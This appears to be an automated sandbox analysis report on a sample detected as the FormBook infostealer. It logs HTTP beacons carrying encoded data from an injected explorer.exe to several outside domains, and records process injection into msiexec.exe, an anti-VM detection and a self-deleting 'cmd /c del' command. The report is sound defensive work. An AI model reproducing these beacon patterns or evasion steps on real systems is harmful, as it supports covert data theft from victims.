Date: Tue, 04 May 2021 16:40:37 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6089bebd-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49765 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:42.996263027 CEST | 5542 | OUT | GET /8u3b/?DzrXY=JlfdOX0KzvBKJCwgzl05144UYnW9L68BcaCAZdJQAkSKjAz8k9yDpbSclDCZ+PzEALYQ&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.effectivemarketinginc.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:40:43.289160967 CEST | 5542 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 04 May 2021 16:40:43 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6089bebd-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49766 | 198.54.117.216 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:49.213042974 CEST | 5543 | OUT | GET /8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.donelys.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49767 | 107.180.51.23 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:54.655491114 CEST | 5545 | OUT | GET /8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.timbraunmusician.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:40:55.565521955 CEST | 5545 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 04 May 2021 16:40:54 GMT
Server: Apache
X-Powered-By: PHP/7.4.11
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://timbraunmusician.com/8u3b/?DzrXY=eX+lvTL7MbK9tAC2dirOGxJtmp01sBQmjLclFmQfDMoi81TUQ4NjHQaRBE4FvlEeLFd1&zR-4v=0v1D8ZZ8otVT4F9P
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49768 | 172.247.179.61 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:41:00.597980022 CEST | 5546 | OUT | GET /8u3b/?DzrXY=mgRUTtjP8oa9OY5PRVEI9pvNIm77vLp11T7wLcVaXT+EQBswbtHCc7JJdGZTw0GPMHIV&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.anygivenrunday.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49770 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:41:11.294384956 CEST | 5549 | OUT | GET /8u3b/?DzrXY=/wAP08hkjicc6Jt0eNBrV8xVMyK0vdY+Qr+E6nWTlRrbM9gWbC2ePToIBG3Sa1gtWFqW&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.2000deal.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:41:11.497021914 CEST | 5549 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 04 May 2021 16:41:11 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6085c4a5-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior


                                                                              System Behavior

                                                                              General

Start time: 18:39:00
Start date: 04/05/2021
Path: C:\Users\user\Desktop\g1EhgmCqCD.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
Imagebase: 0x5b0000
File size: 665600 bytes
MD5 hash: 5551346AA9F251895021B95A2A7CC390
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                              General

Start time: 18:39:11
Start date: 04/05/2021
Path: C:\Users\user\Desktop\g1EhgmCqCD.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\g1EhgmCqCD.exe
Imagebase: 0xe60000
File size: 665600 bytes
MD5 hash: 5551346AA9F251895021B95A2A7CC390
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                              General

Start time: 18:39:14
Start date: 04/05/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                              General

Start time: 18:39:36
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\msiexec.exe
Imagebase: 0x1230000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

                                                                              General

                                                                              Start time:18:39:40
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
                                                                              Imagebase:0x11d0000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:18:39:40
                                                                              Start date:04/05/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff724c50000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis
